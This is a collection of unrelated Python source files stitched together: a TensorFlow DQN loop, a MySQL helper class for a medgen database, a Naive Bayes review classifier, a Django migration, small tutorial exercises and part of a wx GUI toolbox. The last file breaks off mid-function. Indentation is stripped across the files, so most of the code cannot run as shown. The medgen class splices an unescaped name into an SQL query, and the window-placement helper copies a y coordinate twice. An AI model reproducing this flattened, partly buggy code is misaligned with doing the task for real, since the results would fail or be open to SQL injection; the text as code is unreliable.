w2_prime = tf.Variable(tf.random_uniform([H,H2], -1.0, 1.0))
bias2_prime = tf.Variable(tf.random_uniform([H2], -1.0, 1.0))
w3_prime = tf.Variable(tf.random_uniform([H2, outputsize], -1, 1))
bias3_prime = tf.Variable(tf.random_uniform([outputsize], -1, 1))
#Make assign functions for updating Q prime's weights
w1_prime_update= w1_prime.assign(w1)
bias1_prime_update= bias1_prime.assign(bias1)
w2_prime_update= w2_prime.assign(w2)
bias2_prime_update= bias2_prime.assign(bias2)
w3_prime_update= w3_prime.assign(w3)
bias3_prime_update= bias3_prime.assign(bias3)
all_assigns = [
w1_prime_update,
w2_prime_update,
w3_prime_update,
bias1_prime_update,
bias2_prime_update,
bias3_prime_update]
#build network
states_placeholder = tf.placeholder(tf.float32, [None, env.observation_space.shape[0]])
hidden_1 = tf.nn.relu(tf.matmul(states_placeholder, w1) + bias1)
hidden_2 = tf.nn.relu(tf.matmul(hidden_1, w2) + bias2)
hidden_2 = tf.nn.dropout(hidden_2, .5)
Q = tf.matmul(hidden_2, w3) + bias3
hidden_1_prime = tf.nn.relu(tf.matmul(states_placeholder, w1_prime) + bias1_prime)
hidden_2_prime = tf.nn.relu(tf.matmul(hidden_1_prime, w2_prime) + bias2_prime)
hidden_2_prime = tf.nn.dropout(hidden_2_prime, .5)
Q_prime = tf.matmul(hidden_2_prime, w3_prime) + bias3_prime
action_used_placeholder = tf.placeholder(tf.int32, [None], name="action_masks")
action_masks = tf.one_hot(action_used_placeholder, outputsize)
filtered_Q = tf.reduce_sum(tf.mul(Q, action_masks), reduction_indices=1)
#we need to train Q
target_q_placeholder = tf.placeholder(tf.float32, [None,]) # This holds all the rewards that are real/enhanced with Qprime
loss = tf.reduce_sum(tf.square(filtered_Q - target_q_placeholder))
train = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#Setting up the enviroment
D = []
explore = 1.0
rewardList = []
past_actions = []
episode_number = 0
episode_reward = 0
reward_sum = 0
xmax = 1
ymax = 1
xind = 1
yind = 1
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
sess.run(all_assigns)
ticks = 0
for episode in xrange(max_episodes):
state = env.reset()
reward_sum = 0
for step in xrange(max_steps):
ticks += 1
#print state
xmax = max(xmax, state[xind])
ymax = max(ymax, state[yind])
if episode % 10 == 0:
q, qp = sess.run([Q,Q_prime], feed_dict={states_placeholder: np.array([state])})
print "Q:{}, Q_ {}".format(q[0], qp[0])
#print "T: {} S {}".format(ticks, state)
env.render()
if explore > random.random():
action = env.action_space.sample()
else:
#get action from policy
q = sess.run(Q, feed_dict={states_placeholder: np.array([state])})[0]
action = np.argmax(q)
explore = max(explore * explore_decay, min_explore)
new_state, reward, done, _ = env.step(action)
reward_sum += reward
#print reward
D.append([state, action, reward, new_state, done])
if len(D) > memory_size:
D.pop(0);
state = new_state
if done:
break
#Training a Batch
samples = random.sample(D, min(batch_number, len(D)))
#print samples
#calculate all next Q's together for speed
new_states = [ x[3] for x in samples]
all_q_prime = sess.run(Q_prime, feed_dict={states_placeholder: new_states})
y_ = []
state_samples = []
actions = []
terminalcount = 0
for ind, i_sample in enumerate(samples):
state_mem, curr_action, reward, new_state, done = i_sample
if done:
y_.append(reward)
terminalcount += 1
else:
#this_q_prime = sess.run(Q_prime, feed_dict={states_placeholder: [new_state]})[0]
this_q_prime = all_q_prime[ind]
maxq = max(this_q_prime)
y_.append(reward + (gamma * maxq))
state_samples.append(state_mem)
actions.append(curr_action);
sess.run([train], feed_dict={states_placeholder: state_samples, target_q_placeholder: y_, action_used_placeholder: actions})
if ticks % num_of_ticks_between_q_copies == 0:
sess.run(all_assigns)
print 'Reward for episode %f is %f. Explore is %f' %(episode,reward_sum, explore)
if True:#episode % 30 == 0:
teststate = [0 for x in xrange(env.observation_space.shape[0])]
#print "S: ", teststate
X=[]
Y=[]
Z=[]
ZR=[]
xmin = -xmax
xstep = xmax/100.0
ymin = -ymax
ystep = ymax/100.0
test_state_list = []
for x in nplot.drange(xmin,xmax, xstep):
for y in nplot.drange(ymin,ymax,ystep):
teststate[xind] = x
teststate[yind] = y
test_state_list.append([teststate[x] for x in xrange(len(teststate))])
test_q_list = sess.run(Q, feed_dict={states_placeholder:test_state_list})
zmax = max(map(max,test_q_list))
ind = 0
for x in nplot.drange(xmin,xmax, xstep):
XX = []
YY = []
ZZ = []
ZZR = []
for y in nplot.drange(ymin,ymax,ystep):
XX.append(x)
YY.append(y)
ZZ.append(test_q_list[ind][0])
ZZR.append(test_q_list[ind][1])
ind += 1
X.append(XX)
Y.append(YY)
Z.append(ZZ)
ZR.append(ZZR)
nplot.plot(X,Y,Z, ZR, xmin,ymax,zmax)
env.monitor.close()
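The batch-update section above builds the one-step Q-learning target y = r + gamma * max_a Q'(s', a), with terminal transitions getting y = r. A framework-free recap of just that computation (hand-made sample values, not from the environment):

```python
def q_targets(samples, q_prime_rows, gamma=0.995):
    # samples: (reward, done) pairs; q_prime_rows: Q'(s', .) values per sample
    targets = []
    for (reward, done), q_row in zip(samples, q_prime_rows):
        if done:
            targets.append(reward)  # terminal state: no bootstrap term
        else:
            targets.append(reward + gamma * max(q_row))
    return targets

print(q_targets([(1.0, False), (-1.0, True)], [[0.5, 2.0], [9.9, 9.9]]))
```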
# Src/AlgorithmLimp.py (repo: sanjeevmk/GLASS, MIT license)
import torch
torch.manual_seed(10)
torch.cuda.manual_seed_all(10)
import header
import init
import sys
import train_limp
import randomSample
import latentSpaceExplore_VanillaHMC,latentSpaceExplore_NUTSHmc
config = sys.argv[1]
training_params,data_classes,network_params,misc_variables,losses = init.initialize(config)
from torch.autograd import Variable
scale = Variable(torch.tensor(0.01)).cuda()
for rounds in range(training_params.roundEpochs):
train_limp.trainVAE(training_params,data_classes,network_params,losses,misc_variables,rounds,scale)
exit()
# medgen/db/dataset.py (repo: reece/medgen, Apache-2.0 license)
# -*- coding: utf-8 -*-
# from __future__ import absolute_import
from __future__ import unicode_literals, print_function
from pyrfc3339 import parse
import MySQLdb as mdb
import MySQLdb.cursors as cursors
import PySQLPool
from ..log import log, IS_DEBUG_ENABLED
DEFAULT_HOST = 'localhost'
DEFAULT_USER = 'medgen'
DEFAULT_PASS = 'medgen'
DEFAULT_DATASET = 'medgen'
SQLDATE_FMT = '%Y-%m-%d %H:%M:%S'
def EscapeString(value):
value = value.encode("utf-8")
value = mdb.escape_string(value)
return '"{}"'.format(value)
def SQLdatetime(pydatetime_or_string):
if hasattr(pydatetime_or_string, 'strftime'):
dtobj = pydatetime_or_string
else:
# assume pyrfc3339 string
dtobj = parse(pydatetime_or_string)
return dtobj.strftime(SQLDATE_FMT)
class SQLData(object):
"""
MySQL base class for config, select, insert, update, and delete of medgen linked databases.
TODO: more documentation on config.
"""
def __init__(self, *args, **kwargs):
self._cfg_section = kwargs.get('config_section', 'DEFAULT')
from ..config import config
self._db_host = kwargs.get('db_host', None) or config.get(self._cfg_section, 'db_host')
self._db_user = kwargs.get('db_user', None) or config.get(self._cfg_section, 'db_user')
self._db_pass = kwargs.get('db_pass', None) or config.get(self._cfg_section, 'db_pass')
self._db_name = kwargs.get('dataset', None) or config.get(self._cfg_section, 'dataset')
self.commitOnEnd = kwargs.get('commitOnEnd', True) or config.get(self._cfg_section, 'commitOnEnd')
def connect(self):
return PySQLPool.getNewConnection(username=self._db_user,
password=self._db_pass, host=self._db_host, db=self._db_name, charset='utf8', commitOnEnd=self.commitOnEnd)
def cursor(self, execute_sql=None):
conn = self.connect()
cursor = conn.cursor(cursors.DictCursor)
if execute_sql is not None:
cursor.execute(execute_sql)
return [conn, cursor]
def commitPool(self):
'''
Actively commit all transactions in the entire PySQLPool
'''
PySQLPool.commitPool()
def fetchall(self, select_sql):
log.debug(select_sql)
return self.execute(select_sql).record
def fetchrow(self, select_sql):
'''
If the query was successful:
if 1 or more rows was returned, returns the first one
else returns None
Else:
raises Exception
'''
results = self.fetchall(select_sql)
return results[0] if len(results) > 0 else None
def fetchID(self, select_sql, id_colname='ID'):
results = self.fetchrow(select_sql)
if results is not None:
if id_colname in results:
return results[id_colname]
else:
raise RuntimeError("No ID column found. SQL query: %s" % select_sql)
return None # no results found
def list_concepts(self, select_sql):
"""
Fetch list of concepts
:param select_sql: query
:return: list cui
"""
return self.fetchlist(select_sql, 'CUI')
def list_genes(self, select_sql):
"""
Fetch list of genes
:param select_sql: query
:return: list HGNC
"""
return self.fetchlist(select_sql, 'gene_name')
#UNUSED: confirmed not used anywhere in medgen-python or variant2pubmed
#def fetchall_where(self, select_sql, _value, _key=SQLValues.tic('?')):
# return self.fetchall(select_sql.replace(_key, _value))
#UNUSED: confirmed not used anywhere in medgen-python or variant2pubmed
#def results2set(self, select_sql, col='PMID'):
# pubmeds = set()
# for row in self.fetchall(select_sql):
# pubmeds.add(str(row[col]))
# return pubmeds
#TODO: (@nthmost) variant2pubmed usage rectification
#
# Previous declaration:
#def insert(self, sql_insert, sql_values, do_tic=True):
# """
# :param sql_insert: string statement like 'insert into hgvs_query(hgvs_text, .....)'
# :param sql_values: list of values
# """
# if do_tic:
# # reconstructed, probably wrong. doesn't matter, we're not using it.
# values = SQLValues(sql_values)
#
# return self.execute(sql_insert + " values " + SQLValues.AND(sql_values))
def insert(self, tablename, field_value_dict):
'''
:param: tablename: name of table to receive new row
:param: field_value_dict: map of field=value
:return: row_id (integer) (returns 0 if insert failed)
'''
fields = []
values = []
for k,v in field_value_dict.items():
fields.append(k)
values.append(v)
sql = 'insert into {} ({}) values ({});'.format(tablename, ','.join(fields), ','.join(['%s' for v in values]))
queryobj = self.execute(sql, values)
return queryobj.lastInsertID
def update(self, tablename, id_col_name, row_id, field_value_dict):
'''
:param: tablename: name of table to update
:param: row_id (int): row id of record to update
:param: field_value_dict: map of field=value
:return: row_id (integer) (returns 0 if insert failed)
'''
fields = []
values = []
clauses = []
for k, v in field_value_dict.items():
clause = '%s=' % k
# surround strings and datetimes with quotation marks
            if v is None:
clause += 'NULL'
elif hasattr(v, 'strftime'):
clause += '"%s"' % v.strftime(SQLDATE_FMT)
elif hasattr(v, 'lower'):
clause += EscapeString(v) #surrounds strings with quotes and unicodes them.
else:
clause += unicode(v)
clauses.append(clause)
sql = 'update %s set %s where %s=%i;' % (tablename, ', '.join(clauses), id_col_name, row_id)
queryobj = self.execute(sql)
# retrieve and return the row id of the insert. returns 0 if insert failed.
return queryobj.lastInsertID
def delete(self, tablename, field_value_dict):
'''
:param: tablename: name of table to receive new row
:param: field_value_dict: map of field=value
:return: row_id (integer) (returns 0 if insert failed)
'''
if len(field_value_dict) == 0:
raise RuntimeError("Do not support delete without a WHERE clause")
where_sql = ''
for k, v in field_value_dict.items():
            if v is None:
v = 'NULL'
where_sql += 'AND {} is NULL '.format(k)
# surround strings and datetimes with quotation marks
elif hasattr(v, 'strftime'):
v = '"%s"' % v.strftime(SQLDATE_FMT)
where_sql += 'AND {}={} '.format(k, v)
elif hasattr(v, 'lower'):
v = EscapeString(v) # surrounds strings with quotes and unicodes them.
where_sql += 'AND {}={} '.format(k, v)
else:
v = unicode(v)
where_sql += 'AND {}={} '.format(k, v)
where_sql = where_sql[len('AND '):]
sql = 'delete from {} where {};'.format(tablename, where_sql)
log.debug(sql)
queryobj = self.execute(sql)
# retrieve and return the row id of the insert. returns 0 if insert failed.
return queryobj.lastInsertID
def drop_table(self, tablename):
return self.execute(" drop table if exists " + tablename)
def truncate(self, tablename):
return self.execute(" truncate " + tablename)
def execute(self, sql, args=None):
'''
Excutes arbitrary sql string in current database connection.
Returns results as PySQLPool query object.
'''
log.debug('SQL.execute ' + sql)
queryobj = PySQLPool.getNewQuery(self.connect())
queryobj.Query(sql, args)
return queryobj
def ping(self):
'''
Same effect as calling 'mysql> call mem'
:returns::self.schema_info(()
'''
try:
return self.schema_info()
        except mdb.Error as e:
log.error("DB connection is dead %d: %s" % (e.args[0], e.args[1]))
return False
def schema_info(self):
header = ['schema', 'engine', 'table', 'rows', 'million', 'data length', 'MB', 'index']
return {'header': header, 'tables': self.fetchall('call mem')}
def last_loaded(self, dbname='DATABASE()'):
return self.fetchID(
"select event_time as ID from " + dbname + "." + "log where entity_name = 'load_database.sh' and message = 'done' order by idx desc limit 1")
def PMID(self, sql):
'''
For given sql select query, return a list of unique PMID strings.
'''
pubmeds = set()
for row in self.fetchall(sql):
pubmeds.add(str(row['PMID']))
return pubmeds
def hgvs_text(self, sql):
"""
For given sql select query, return a list of unique hgvs_text strings.
"""
hgvs_texts = set()
for row in self.fetchall(sql):
hgvs_texts.add(str(row['hgvs_text']))
return hgvs_texts
def trunc_str(self, inp, maxlen):
'''
Useful utility method for storing text in a database
:param inp: a string
:param maxlen: the max length of that string
:return: '"%s"' % s or '"%s..."' % s[:m-3]
'''
if maxlen < 3:
raise RuntimeError('maxlen must be at least 3')
if len(inp) > maxlen:
inp = '%s...' % inp[:maxlen - 3]
return inp
def get_last_mirror_time(self, entity_name):
'''
Get the last time some entity was mirrored
:param entity_name: table name for db, for example, bic_brca1
:return: datetime if found
'''
sql_query = 'SELECT event_time FROM log WHERE entity_name = "?" AND message like "rows loaded %" ORDER BY event_time DESC limit 1'.replace(
'?', entity_name)
result = self.fetchrow(sql_query)
if result:
return result['event_time']
raise RuntimeError('Query "%s" returned no results. Have you loaded the %s table?' % (sql_query, entity_name))
def create_index(self, table, colspec):
"""
Create index on a specified table using the colums defined.
Index start/stop times are logged to the "log" table.
:param table: name of the table, example, "train"
:param colspec: name of column, for example, "RQ"
:return:
"""
self.execute("call create_index('%s', '%s') " % (table, colspec))
def fetchlist(self, select_sql, column='gene_name'):
"""
Fetch as list
:param select_sql: query
:param column: name of column you want to make a list out of
:return: list
"""
rows = self.fetchall(select_sql)
        return [] if rows is None else [str(r[column]) for r in rows]
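SQLData.insert above assembles its statement from the field names plus one %s placeholder per value, leaving the actual escaping to the database driver. A driver-free sketch of just that string construction — the table and field names here are made up:

```python
def build_insert(tablename, field_value_dict):
    fields = []
    values = []
    for k, v in field_value_dict.items():
        fields.append(k)
        values.append(v)
    # One %s placeholder per value; the DB driver binds them safely
    sql = 'insert into {} ({}) values ({});'.format(
        tablename, ','.join(fields), ','.join(['%s' for _ in values]))
    return sql, values

sql, vals = build_insert('log', {'entity_name': 'loader', 'message': 'done'})
print(sql)  # insert into log (entity_name,message) values (%s,%s);
```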
# archive/LoadData.py (repo: sjayakum/csci544, Apache-2.0 license)
stop_words_dict= {'': 0, 'all': 0, 'these': 0, 'are': 0, "weren't": 0, "they're": 0, 'those': 0, 'why': 0, 'under': 0, 'same': 0, "aren't": 0, 'his': 0, 'her': 0, 'had': 0, "she'd": 0, 'no': 0, 'your': 0, 'not': 0, 'because': 0, 'they': 0, 'which': 0, 'further': 0, "hadn't": 0, "he's": 0, 'while': 0, 'himself': 0, "here's": 0, "doesn't": 0, "you'll": 0, 'so': 0, "wasn't": 0, 'that': 0, "hasn't": 0, "we'll": 0, 'any': 0, "you'd": 0, "we'd": 0, "shouldn't": 0, 'nor': 0, 'their': 0, 'who': 0, 'into': 0, 'were': 0, 'some': 0, 'whom': 0, 'over': 0, "she's": 0, 'each': 0, "they'll": 0, 'until': 0, 'me': 0, "what's": 0, 'of': 0, 'themselves': 0, 'being': 0, 'against': 0, 'or': 0, "you're": 0, "where's": 0, "i'll": 0, 'from': 0, 'him': 0, 'is': 0, 'out': 0, 'on': 0, "i've": 0, 'theirs': 0, 'about': 0, 'few': 0, 'could': 0, "haven't": 0, "they've": 0, "don't": 0, 'been': 0, "couldn't": 0, "how's": 0, 'has': 0, 'only': 0, 'you': 0, 'yours': 0, 'most': 0, 'she': 0, "it's": 0, 'when': 0, 'ought': 0, 'did': 0, "can't": 0, "she'll": 0, 'down': 0, "why's": 0, "we've": 0, "let's": 0, "isn't": 0, 'here': 0, "mustn't": 0, 'where': 0, 'again': 0, "that's": 0, 'should': 0, 'hers': 0, 'an': 0, "who's": 0, 'do': 0, 'other': 0, 'be': 0, 'if': 0, "wouldn't": 0, 'then': 0, 'but': 0, 'between': 0, 'once': 0, 'at': 0, 'too': 0, 'both': 0, 'its': 0, "i'm": 0, 'and': 0, "didn't": 0, 'to': 0, 'through': 0, 'than': 0, 'our': 0, 'how': 0, 'in': 0, 'he': 0, 'herself': 0, "when's": 0, 'yourself': 0, 'cannot': 0, 'having': 0, 'was': 0, 'them': 0, 'itself': 0, "shan't": 0, "he'd": 0, 'there': 0, "he'll": 0, 'would': 0, "you've": 0, 'myself': 0, 'it': 0, 'i': 0, 'during': 0, 'am': 0, "i'd": 0, "there's": 0, 'off': 0, 'very': 0, 'below': 0, 'what': 0, 'a': 0, 'own': 0, 'up': 0, 'above': 0, 'my': 0, "they'd": 0, 'does': 0, "won't": 0, 'before': 0, 'by': 0, 'for': 0, 'such': 0, 'ours\tourselves': 0, 'yourselves': 0, 'more': 0, 'the': 0, 'this': 0, 'as': 0, 'we': 0, 'have': 0, "we're": 0, 'with': 0, 
'doing': 0, 'after': 0}
def tokenize(sentence):
sentence = ' '.join(sentence)
sentence = sentence.lower()
sentence = sentence.split(' ')
return_list = []
for each_word in sentence:
if each_word not in stop_words_dict:
return_list.append(each_word.strip('\n'))
return return_list
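tokenize() joins, lower-cases, splits on single spaces, filters stopwords, then strips trailing newlines. A stand-alone check of the same logic against a tiny stopword set (not the full dictionary above):

```python
def tokenize_sketch(tokens, stopwords):
    # Join, lower-case, re-split, then drop stopwords and strip newlines
    words = ' '.join(tokens).lower().split(' ')
    return [w.strip('\n') for w in words if w not in stopwords]

print(tokenize_sketch(['The', 'room', 'was', 'Great\n'], {'the', 'was'}))  # ['room', 'great']
```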
f = open('train-text.txt', 'r')
l = open('train-labels.txt', 'r')
keys = {}
words = []
i = 0
for each_line in f:
temp = each_line.split(' ')
keys[temp[0]] = i
i += 1
words.append(tokenize(list(temp[1:])))
class1 = [0] * len(words)
class2 = [0] * len(words)
for each_line in l:
temp = each_line.split(' ')
class1[keys[temp[0]]] = temp[1].strip('\n')
class2[keys[temp[0]]] = temp[2].strip('\n')
# print(words[:2])
# print(class1[:2])
# print(class2[:2])
import collections
probs = collections.defaultdict(dict)
vocab = []
for each_sentence in words:
for each_word in each_sentence:
vocab.append(each_word)
vocab = set(vocab)
for each_vocab in vocab:
temp_dict = {}
temp_dict['positive']=0
temp_dict['negative']=0
temp_dict['deceptive']=0
temp_dict['truthful']=0
probs[each_vocab] = temp_dict
deceptive_prior = 0
truthful_prior = 0
positive_prior = 0
negative_prior = 0
for each_class in class1:
if each_class == 'deceptive':
deceptive_prior += 1
if each_class == 'truthful':
truthful_prior += 1
for each_class in class2:
if each_class == 'positive':
positive_prior += 1
if each_class == 'negative':
negative_prior += 1
deceptive_prior = (deceptive_prior / len(class1))
truthful_prior = (truthful_prior / len(class1))
positive_prior = (positive_prior / len(class1))
negative_prior = (negative_prior / len(class1))
positive_words_count = {}
negative_words_count = {}
for i in range(len(class1)):
if class2[i] == 'positive':
for each_word in words[i]:
probs[each_word]['positive']+=1
if each_word not in positive_words_count:
positive_words_count[each_word] = 1
else:
positive_words_count[each_word] += 1
    if class2[i] == 'negative':
        for each_word in words[i]:
            probs[each_word]['negative'] += 1
            if each_word not in negative_words_count:
                negative_words_count[each_word] = 1
            else:
                negative_words_count[each_word] += 1
truthful_words_count = {}
deceptive_words_count = {}
for i in range(len(class1)):
    if class1[i] == 'deceptive':
        for each_word in words[i]:
            probs[each_word]['deceptive'] += 1
            if each_word not in deceptive_words_count:
                deceptive_words_count[each_word] = 1
            else:
                deceptive_words_count[each_word] += 1
    if class1[i] == 'truthful':
        for each_word in words[i]:
            probs[each_word]['truthful'] += 1
            if each_word not in truthful_words_count:
                truthful_words_count[each_word] = 1
            else:
                truthful_words_count[each_word] += 1
positive_words_count = {k: v / total for total in (sum(positive_words_count.values()),) for k, v in
positive_words_count.items()}
negative_words_count = {k: v / total for total in (sum(negative_words_count.values()),) for k, v in
negative_words_count.items()}
truthful_words_count = {k: v / total for total in (sum(truthful_words_count.values()),) for k, v in
truthful_words_count.items()}
deceptive_words_count = {k: v / total for total in (sum(deceptive_words_count.values()),) for k, v in
deceptive_words_count.items()}
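The four normalizations above rely on a dict-comprehension idiom: `for total in (sum(d.values()),)` iterates over a one-element tuple, binding the total once so it is not recomputed for every item. A minimal standalone sketch of the same idiom:

```python
def normalize(counts):
    # bind the total once via a one-element tuple, then divide each count by it
    return {k: v / total
            for total in (sum(counts.values()),)
            for k, v in counts.items()}

freqs = normalize({'good': 3, 'bad': 1})
# freqs == {'good': 0.75, 'bad': 0.25}
```

A plain `total = sum(counts.values())` on its own line is clearer; the tuple trick only matters when the whole expression must stay a single comprehension.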
# print(positive_words_count)
print(probs)
test_data_point_number = 1245
import math
test_data = tokenize(words[test_data_point_number])
print(' '.join(words[test_data_point_number]))
# CLASS 1
positive_posterior = 0
for each_word in test_data:
    try:
        positive_posterior += math.log(positive_words_count[each_word])
    except KeyError:
        pass
# in log space the prior is added, not multiplied
positive_final = positive_posterior + math.log(positive_prior)
# CLASS 2
negative_posterior = 0
for each_word in test_data:
    try:
        negative_posterior += math.log(negative_words_count[each_word])
    except KeyError:
        print(each_word, ' not in source')
negative_final = negative_posterior + math.log(negative_prior)
print(positive_final,negative_final)
if positive_final > negative_final:
print('POSITIVE')
else:
print('NEGATIVE')
print(class2[test_data_point_number])
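In log space a Naive Bayes score is the sum of per-word log-likelihoods plus the log of the class prior, and add-one smoothing keeps unseen words from producing `log(0)`. A minimal self-contained sketch of that scoring rule; the toy word counts and 0.5 priors below are made up for illustration:

```python
import math

def nb_score(words, word_counts, prior, vocab_size):
    # add-one (Laplace) smoothing: unseen words get count 0 + 1
    total = sum(word_counts.values())
    score = math.log(prior)
    for w in words:
        score += math.log((word_counts.get(w, 0) + 1) / (total + vocab_size))
    return score

pos = {'great': 3, 'fun': 2}
neg = {'awful': 4, 'dull': 1}
vocab = len(set(pos) | set(neg))
doc = ['great', 'fun']
label = 'POSITIVE' if nb_score(doc, pos, 0.5, vocab) > nb_score(doc, neg, 0.5, vocab) else 'NEGATIVE'
# label == 'POSITIVE'
```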
# File: mysite/recipes/migrations/0031_merge_20161201_0145.py
# Repo: Jason0705/ICanCook (Unlicense)
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-01 01:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('recipes', '0030_auto_20161129_2138'),
('recipes', '0030_merge_20161130_0139'),
]
operations = [
]
# File: python全栈/day43/day43-6 类装饰器.py
# Repo: Ringo-li/python_exercise_100 (MIT)
# Class decorator: use a class to decorate an existing function
class MyDecorator(object):
    def __init__(self, func):
        self.__func = func

    # Implement __call__ so the instance becomes callable like a function
    def __call__(self, *args, **kwds):
        # Wrap the original function, forwarding any arguments
        print("The lecture is over")
        self.__func(*args, **kwds)

@MyDecorator  # MyDecorator => show = MyDecorator(show)
def show():
    print("Class dismissed!")

# Calling show() now invokes the instance created by MyDecorator
show()
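A class decorator in this style discards the wrapped function's return value and loses its name and docstring. A variant that forwards both and uses `functools.update_wrapper` to preserve metadata (the `LogCalls` name is hypothetical) might look like:

```python
import functools

class LogCalls(object):
    def __init__(self, func):
        self.func = func
        functools.update_wrapper(self, func)  # copy __name__, __doc__, etc.

    def __call__(self, *args, **kwargs):
        # forward arguments and propagate the return value
        return self.func(*args, **kwargs)

@LogCalls
def add(a, b):
    return a + b

# add(2, 3) == 5 and add.__name__ == 'add'
```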
#!/usr/bin/env python
# File: app/annohub/lib/fileutils.py
# Repo: inktrap/annohub (MIT)
# -*- coding: utf-8 -*-
from annohub import app
from annohub.lib import error as e
def try_unicode(this_string, errors='strict'):
u''' taken from <https://stackoverflow.com/a/9600161>
and changed so it turns input into unicode
Attention: Order of ENCODINGS_ALLOWED is important.
'''
assert isinstance(this_string, basestring), repr(this_string)
for enc in app.config['ENCODINGS_ALLOWED']:
try:
return unicode(this_string, enc, errors)
except UnicodeError, exc:
continue
raise e.FileutilsInvalidFileEncodingException
def read_file(this_file):
u''' read the file '''
try:
data = this_file.read()
except IOError:
raise e.FileutilsInvalidFileReadException
# stripping unnecessary spaces to test if file is empty
data = try_unicode(data).strip()
#app.logger.debug(len(data))
#app.logger.debug(app.config['SIZE_LIMIT'])
if len(data) > app.config['SIZE_LIMIT']:
raise e.FileutilsFileTooLargeException
elif len(data) > 0:
return data
else:
raise e.FileutilsEmptyFileException
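`try_unicode` above is Python 2 (`basestring`, `unicode`). A Python 3 analogue of the try-each-encoding loop, with a hypothetical `ENCODINGS_ALLOWED` list standing in for the app config:

```python
ENCODINGS_ALLOWED = ['utf-8', 'latin-1']  # hypothetical; order matters

def try_decode(raw, errors='strict'):
    assert isinstance(raw, bytes), repr(raw)
    for enc in ENCODINGS_ALLOWED:
        try:
            return raw.decode(enc, errors)
        except UnicodeError:
            continue
    raise ValueError('no allowed encoding could decode the data')

# b'caf\xc3\xa9' decodes as UTF-8; b'caf\xe9' fails UTF-8 and falls through to latin-1
```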
# File: Built-In functions in Python.py
# Repo: MYJOR/Software-Engineering-With-Python (MIT)
# built-in functions
from math import *
#abs() function
number=-120
print(abs(number))
#len() function
name_1='sam'
name_2="JOSH"
print(len(name_1))
#upper()function
print(name_1.upper())
#lower() function
print(name_2.lower())
#replace function
print(name_1.replace(name_1,name_2))
#String Function
# print(str(number)/2)
# commented out: this raises a TypeError because str(number) is a string, not an integer
#int function
numberString='1200'
print(int(numberString)/3)
#float function
print(float(numberString)/4.5)
#power function
base=5
power=2
print(pow(base,power))
#max function returns the greatest value in a list
Num1=24.8
Num2=25.2
Num3=25.1
print("the greatest value is ",max(Num1,Num2,Num3))
#Min function returns the smallest value in a list
print("the smallest value in the list is ",min(Num1,Num2,Num3))
#round function
Num4= 4.67
print(round(Num4))
Num5=5.6787556
print(round(Num5,3))  # the second argument limits the digits kept after the decimal point
#sqrt function
Num6=4
print(sqrt(Num6))
#floor function
Num7=4.7
print(floor(Num7))
#Substring function
City="Baghdad"
print(City[0:3])
#help function
#print(help())
#range function
for numbers in range(1,100):
print(numbers)
# the third argument is the step: range(1,100,2) yields every other number
for Skips in range(1,100,2):
print(Skips)
#Slice Function
List=[100,200,300,400,500,600,700,800]
SlicedList=slice(1,5)
print(List[SlicedList])
#Slice and skip indexes
List=[100,200,300,400,500,600,700,800]
SlicedList=slice(1,5,2)
print(List[SlicedList])
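A `slice` object is interchangeable with subscript syntax, and its `indices()` method resolves the concrete bounds for a given sequence length; a quick check of both:

```python
data = [100, 200, 300, 400, 500, 600, 700, 800]
s = slice(1, 5, 2)
# data[s] is the same as data[1:5:2]
same = data[s] == data[1:5:2] == [200, 400]
# indices() resolves the concrete (start, stop, step) for a given length
bounds = s.indices(len(data))
# bounds == (1, 5, 2)
```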
# File: digsby/src/gui/toolbox/toolbox.py
# Repo: ifwe/digsby (Python-2.0 license)
'''
GUI utilities.
'''
from __future__ import with_statement
from __future__ import division
import config
import functools
import wx, struct
from wx import GetTopLevelWindows, Point, Size
from logging import getLogger; log = getLogger('gui.util')
from traceback import print_exc
from PIL import Image, ImageDraw, ImageFont
from ConfigParser import ConfigParser
import sys
from collections import defaultdict
from time import clock as time_clock
from gui.toolbox.monitor import Monitor
import cgui, new
import simplejson as json
import os.path
# adds methods to Bitmap, Image, etc...
import imagefx #@UnusedImport
wxMSW = 'wxMSW' in wx.PlatformInfo
# colors in skin YAML can start with this string
color_prefix = '0x'
def __repr__(self):
'''wxBitmap repr showing its .path, if it has one.'''
try:
path = getattr(self, 'path', '')
return '<wxBitmap %d%s>' % (id(self), (' '+os.path.normpath(path)) if path else '')
except Exception:
return '<wxBitmap %d>' % id(self)
wx.Bitmap.__repr__ = __repr__
del __repr__
# convenience method for removing all of a wxMenu's items
wx.Menu.RemoveAllItems = lambda self: [self.RemoveItem(item) for item in self.GetMenuItems()]
wx.Window.Tip = property(lambda self: self.GetToolTip().GetTip(),
lambda self, tip: self.SetToolTip(wx.ToolTip(tip)))
def check_destroyed(ctrl):
if wx.IsDestroyed(ctrl):
code = sys._getframe(1).f_code
print >> sys.stderr, 'WARNING: destroyed object being used (%s in %s:%d)' % \
(code.co_name, code.co_filename, code.co_firstlineno)
return True
return False
################################################################################
if wxMSW:
import ctypes
from ctypes import byref, WinError
from ctypes.wintypes import UINT, POINT, RECT
user32 = ctypes.windll.user32
class WINDOWPLACEMENT(ctypes.Structure):
_fields_ = [('length', UINT),
('flags', UINT),
('showCmd', UINT),
('ptMinPosition', POINT),
('ptMaxPosition', POINT),
('rcNormalPosition', RECT)]
def GetWindowPlacement(win):
hwnd = win.GetHandle()
p = WINDOWPLACEMENT()
p.length = ctypes.sizeof(WINDOWPLACEMENT)
if not user32.GetWindowPlacement(hwnd, byref(p)):
raise WinError()
return windowplacement_todict(p)
def SetWindowPlacement(win, d):
d2 = GetWindowPlacement(win)
d2['rcNormalPosition'] = d['rcNormalPosition']
d2['showCmd'] |= 0x0020 # SWP_FRAMECHANGED
d = d2
p = windowplacement_fromdict(d)
if not user32.SetWindowPlacement(win.Handle, byref(p)):
raise WinError()
def windowplacement_todict(p):
return dict(flags = p.flags,
showCmd = p.showCmd,
ptMinPosition = (p.ptMinPosition.x, p.ptMinPosition.y),
ptMaxPosition = (p.ptMaxPosition.y, p.ptMaxPosition.y),
rcNormalPosition = (p.rcNormalPosition.left, p.rcNormalPosition.top, p.rcNormalPosition.right, p.rcNormalPosition.bottom))
def windowplacement_fromdict(d):
p = WINDOWPLACEMENT()
p.length = ctypes.sizeof(WINDOWPLACEMENT)
p.showCmd = int(d['showCmd'])
p.ptMinPosition = POINT()
p.ptMinPosition.x = int(d['ptMinPosition'][0])
p.ptMinPosition.y = int(d['ptMinPosition'][1])
p.ptMaxPosition = POINT()
